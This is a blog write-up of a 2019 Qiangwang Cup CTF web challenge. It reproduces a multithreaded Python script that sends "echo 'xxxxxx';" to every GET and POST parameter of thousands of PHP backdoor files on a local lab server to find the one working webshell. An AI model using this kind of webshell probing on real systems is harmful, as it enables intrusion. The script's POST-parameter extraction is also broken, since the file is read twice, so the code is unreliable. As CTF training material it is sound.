[强网杯 2019]高明的黑客 1

最新推荐文章于 2024-02-29 11:12:24 发布
最新推荐文章于 2024-02-29 11:12:24 发布
阅读量575 收藏
点赞数
文章标签: 安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/plant1234/article/details/125105926
版权

[强网杯 2019]高明的黑客 1

打开题目得到:

在这里插入图片描述

根据提示下载源码:
得到:

在这里插入图片描述
通过查看文件发现里面有一句话木马等不能用

本题的目的就是通过,编写脚本查找木马

大佬的脚本:

import os
import requests
import re
import threading
import time
print('start:  '+  time.asctime( time.localtime(time.time()) ))
#输出当前日期时间
s1=threading.Semaphore(100)
#线程数100
filePath = r"D:\phpstudy_pro\WWW\src"
#为文件地址
os.chdir(filePath)
#改变当前工作目录到指定的路径
#本来的工作目录在D盘,修改到文件所在地址
requests.adapters.DEFAULT_RETRIES = 5
#连接失败后重连的次数为5次,因为如果线程如果太高,可能访问有时会报错
files = os.listdir(filePath)
#列出filePath路径下所有文件名
session = requests.Session()
#保持会话
session.keep_alive = False
#设置连接活跃状态为False
def get_content(file):
    s1.acquire()
#多个线程共同对某个数据修改,则可能出现不可预料的结果,为了保证数据的正确性,需要对多个线程进行同步。共享数据。
#比如a要访问flag这个参数,但b正在访问,那么先暂停a,等b执行完在执行a。
    print('trying   '+file+ '     '+ time.asctime( time.localtime(time.time()) ))
#输出时间
    with open(file,encoding='utf-8') as f:
#以utf-8打开文件
            gets = list(re.findall('\$_GET\[\'(.*?)\'\]', f.read()))
#全局正则匹配,读出当前文件的所有get参数
#\$对$转义\[、\'、\]同样是转义,(.*?)以非贪婪模式匹配\' \'内的所有字符串,并分组
            posts = list(re.findall('\$_POST\[\'(.*?)\'\]', f.read()))
#全局正则匹配,读出当前文件的所有post参数
    data = {}
    params = {}
#data数组存post参数值,params存get参数名
    for m in gets:
        params[m] = "echo 'xxxxxx';"
    for n in posts:
        data[n] = "echo 'xxxxxx';"
#把所有的get和post参数名以键名的方式赋给data和params,并赋值echo 'xxxxxx';
#赋值echo 'xxxxxx';是为了方便我们判断此参数有没有用。
    url = 'http://localhost/src/'+file
    req = session.post(url, data=data, params=params)
#会话方式,和requests.post访问查不多,但在这里会更快,它不需要不停重新访问。
#一次性请求所有的GET和POST
    req.close()
#关闭会话,释放内存
    req.encoding = 'utf-8'
    content = req.text
#得到所有访问的页面内容
    #print(content)
    if "xxxxxx" in content:
#如果发现存在,则继续挨个访问,并筛选出具体的参数
        flag = 0
#用来判断是get请求成功,则为1,是post成功则为0
        for a in gets:
            req = session.get(url+'?%s='%a+"echo 'xxxxxx';")
            content = req.text
            req.close()
            if "xxxxxx" in content:
                flag = 1
                break
        if flag != 1:
#如果此时flag不为1,则说明get所有参数都不存在
            for b in posts:
                req = session.post(url, data={b:"echo 'xxxxxx';"})
                content = req.text
                req.close()
                if "xxxxxx" in content:
                    break
        if flag == 1:
            param = a
#如果flag为1,则记录param为a,也就是此时get参数名
        else:
            param = b
        print('file: '+file+"  and param:%s" %param)
#输出成功的文件名和参数名
        print('endtime: ' + time.asctime(time.localtime(time.time())))
    s1.release()
    #释放锁,开始下一个线程

for i in files:
    t = threading.Thread(target=get_content, args=(i,))
    t.start()
#线程开始

在这里插入图片描述

访问木马得到flag:

在这里插入图片描述

南冥~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUctf 刷题之[强网杯 2019]高明黑客 1
dwrnxjlove的博客
08-09 865
[强网杯 2019]高明黑客 1 打开题目之后是一段简单的话: 提示到网站的源码在www.tar.gz里,于是访问,下载网页源码,下载之后发现并不是网页源码,解压下载的文件发现里面有3000多个php文件,于是用D盾粗扫了一遍,发现全是报后门文件,但是尝试利用,发现前面一个文件都不能用,但是这3000多个文件必然有可以用的,于是就尝试进行文件遍历,找出可以利用的文件: 附上自己的脚本: import re import os import requests files = os.listdir(r'C
CTF [强网杯 2019]高明黑客 writeup
baynk的博客
04-07 2033
一来搞下,有点意思,然后直接在url后面加上www.tar.gz进行下载文件下载,这文件有点大,下载的有点慢,我以为是出错了,又去扫目录。。wtf。。不管扫啥都是200。。。 不过好在,等扫描完了,文件下好了。 40M,真的狠,一打开,我惊了。 3000个文件。。命令看起来还没啥规则 。 硬着头皮解压后,随意点开一个文件。 1800多行。。。丢在本地环境里面去运行下,还尼玛报错了。 不...
[强网杯 2019]高明黑客
pakho_C的博客
04-16 1108
web第42题 [强网杯 2019]高明黑客 打开靶场 根据提示下载备份文件 里面有几千个php文件 审计一下发现,很多类似于这种,有命令执行的可能,但是很多将参数置空了,无法利用,只能自己寻找可以利用的php文件,手动寻找不现实 ,只能编写脚本 学习大佬的脚本: 出处:[强网杯 2019]高明黑客(考察代码编写能力) import os import requests import re import threading import time print('开始时间: '+ time.asc
[强网杯 2019]高明黑客(考察代码编写能力)
a3320315的博客
11-07 9559
0x01 试题分析 1、我们先打开题目,提示可以下载源码 下载源码,打开是几千个php文件,而且很乱,根本没法看,不过里面包含很多shell 不过很多shell都没用,所以我们猜测这几千个php文件中肯定含有可以使用的shell,我们只有写脚本去试了。 0x02 脚本分析 – coding: utf-8 – import os import requests import re import...
【BUUCTF】web强网杯2019随便注
12-14
1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: 库:1’;show databases;# ...
[强网杯 2019]随便注.docx
12-18
强网杯
强网杯 WriteUp By Nu1L
08-02
2022年第六届“强网杯”全国网络安全挑战赛
2019 第三届强网杯线上赛.zip
12-17
强网杯
强网杯2022 pwn 赛题解析.docx
12-18
强网杯2022 Pwn赛题解析】 在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
脚本匹配get,post [强网杯 2019]高明黑客1
最新发布
m0_75178803的博客
02-29 392
打开题目访问www.tgr.gz,下载源码解压以后发现里面有很多文件,只有一个是index.html,其余都是php文件。并且尝试访问也有看大佬的wp是说,应该找存在形如以下的结构,传入payload找flag。步骤大致是字符匹配$_GET[$_POST[,尝试往匹配到的参数名传递echo,看看哪些参数可以接收到参数并打印出来。这里依旧是用大佬的脚本跑一下最终找到了利用文件: xk0SzyKwfzw.php找到了利用的参数:Efa5BVG命令执行, payload:得到flag。
buuctf-web-[强网杯 2019]高明黑客1
mlws1900的博客
08-20 402
解题思路就是用get和post对所有文件进行挨个传参,一句话返回一个预定的值就利用该文件来获取flag。借其他大佬的脚本一用(跟扫目录返回状态码一个思路)直接复制www.tar.gz下载源码。打开发现很多个php文件。随机打开一个,观察源代码。利用以下payload。
BUUCTF—WEB-高明黑客
迷风小白
06-25 6794
高明黑客 下载www.tar.gz 发现是很多混乱的shell,不过某些地方还是有迹可循的,可以通过$_GET或者$_POST传参回显 可以写个脚本批量扫描一下文件里的$_GET和$_POST,然后统一赋值echo "got it",如果回显结果中包含got it,那么证明该文件为可用shell python脚本如下: import os import requests from mult...
[强网杯 2019] web题-高明黑客
BROTHERYY的博客
07-08 1002
复现环境:buuoj.cn 下载下来的源码很大,大到让人傻掉 看了下大佬的wp 是说找出这些源码中所有的GET和POST请求,模拟请求一遍,看看那个能RCE能够使用。 这里贴出赵师傅的Python脚本 膜一波 import os import threading from concurrent.futures.thread import ThreadPoolExecutor import requests session = requests.Session() path = "/Users/ji
BUUCTF__[强网杯 2019]高明黑客_题解
风过江南乱的博客
05-31 1721
前言 其实这题的唯一考点就是编写 python 脚本。 用了几天时间来看一下 python ,发现有些内容与我以前学的c语言差不多,只是换个形式而已,比如说 if 、for 、while 对文件操作等等。那最大的特点就是很多功能函数,开箱既用,只需要引用模块就行了。可能这就是面向对象编程的特点吧,你不知道它怎么实现的,你只知道它能干什么。 也有很多不一样的,比如说,迭代、元组、继承、异常处理等等。 还有一点是python2 和python3。有点差别,比如说 print 函数等等,python3 有些东西
CTF-RE-JustRE (2019第三届强网杯
SuperGate的博客
06-06 1396
首先IDA点开进行静态分析: 发现判断函数sub_401610,点进去看之后发现很长一串……前面比较好说,是将前8位字符变hex放入eax寄存器中,第9,10位变hex放入ch(还是dh?)中 然后再往下面拉,可以看到很多SSE指令集,但是不是很复杂,网上可以搜到,发现都是一些比较基础数位操作。 这个地方的v27在后面会频繁用到,值为第9,10位变hex后的128位填充 这里是对...
【Writeup】BUUCTF_Web_高明黑客
BAKUMANSEC - Just Do It
08-19 1117
0x01 解题思路   这题下载源码一看似乎有很多一句话木马,但是大多数根本没法执行命令,而且文件和参数都比较多,所以比较普遍的做法是本地搭个环境(PHP7)尝试所有的GET和POST参数。CTF Writeups给的wp:https://www.ctfwp.com/articals/2019qiangwang.html#%E9%AB%98%E6%98%8E%E7%9A%84%E9%BB%91%...
BUUCTF WEB 高明黑客1
qq_41696858的博客
12-13 470
这题也没啥好说的,就是硬跑脚本 打开场景,就是让你下www.tar.gz 解压好了,两千多个PHP,execuse me??????? 打开看看,每个PHP文件里面都有eval,exec之类的,但也不是全部有用,事实上,跑完就只有一个参数有用 就是通过脚本,不断地去试,也没啥好说的,两种做法: 1.把文件全都下到本地,自己开个环境,把最大连接数调大些,自己跑,找到参数,再去利用 2.直接用靶场跑,我测试了一下,BUUCTF能承受的最大的连接数在20左右,我把网上大佬在本地跑的脚本改了一下,加了几个sleep
buuctf-强网杯2019随便注
09-03
buuctf-强网杯2019随便注是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。 注入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中注入恶意代码来获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值